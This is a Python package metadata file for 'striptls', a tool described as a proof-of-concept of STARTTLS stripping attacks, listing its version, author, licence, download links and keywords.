Metadata-Version: 1.1
Name: striptls
Version: 0.1
Summary: poc implementation of STARTTLS stripping attacks
Home-page: https://github.com/tintinweb/striptls/
Author: tintinweb
Author-email: tintinweb@oststrom.com
License: GPLv2
Download-URL: https://github.com/tintinweb/striptls/tarball/v0.1
Keywords: striptls,starttls,strip,attack,proxy
Platform: UNKNOWN
